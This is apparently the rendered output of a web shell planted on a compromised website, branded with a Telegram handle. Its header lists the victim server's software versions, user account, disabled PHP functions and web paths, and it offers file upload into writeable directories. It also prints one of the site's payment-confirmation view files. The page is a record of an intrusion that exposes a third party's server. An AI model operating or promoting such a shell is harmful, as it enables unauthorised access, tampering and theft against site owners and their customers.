https://t.me/RX1948
Server : Apache/2.4.18 (Ubuntu)
System : Linux canvaswebdesign 3.13.0-71-generic #114-Ubuntu SMP Tue Dec 1 02:34:22 UTC 2015 x86_64
User : oppastar ( 1041)
PHP Version : 7.0.33-0ubuntu0.16.04.15
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
Directory :  /var/www/kanvakanva.com/public_html/application/views/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //var/www/kanvakanva.com/public_html/application/views/payment_confirmation_old.php
<div style="display:flex; justify-content:center; align-items:center; padding:30px 0;">
    <div>
        <h4>CONFIRM PAYMENT</h4>   
        <p>I'd like to confirm my payment</p>
        <?= $this->session->flashdata('success'); //to display success message ?> 
        <br> 
        <!-- Form Start --> 
        <?php
            $attributes = array('method' => 'get');
        ?>
        <?php echo form_open('payment_confirmation/load_payment_page', $attributes); ?>

        <div class="left" style="width:125px; float:left; margin-bottom: 16px;">Order Id &nbsp;&nbsp;<a href="#" data-toggle="modal" data-target="#confirmPaymentModal"><i class="fa fa-question-circle"></i></a></div>

        <div  class="right" style="margin-bottom: 16px;">
            <?php
                $data = array( 
                    'name'        => 'order_id',
                    'id'          => 'order_id',
                    'value'       =>  set_value('order_id'),
                    'maxlength'   => '200',
                    'class'       => 'form-control',
                    'size'        => '50',
                    'required'    => 'required'
                  
                );
                echo form_input($data);
                echo '<span style="font-size:10px;">' . form_error('order_id') . '</span>';
            ?>
        </div> 

        <input type="submit" value="SUBMIT" style="background:#443d41; color: white; height: 29px; margin-top: 5px; width: 170px; border:none; cursor: pointer;" />
        <br /><br />
        <?php echo form_close(); ?>	  
    </div>
</div>

https://t.me/RX1948 - 2025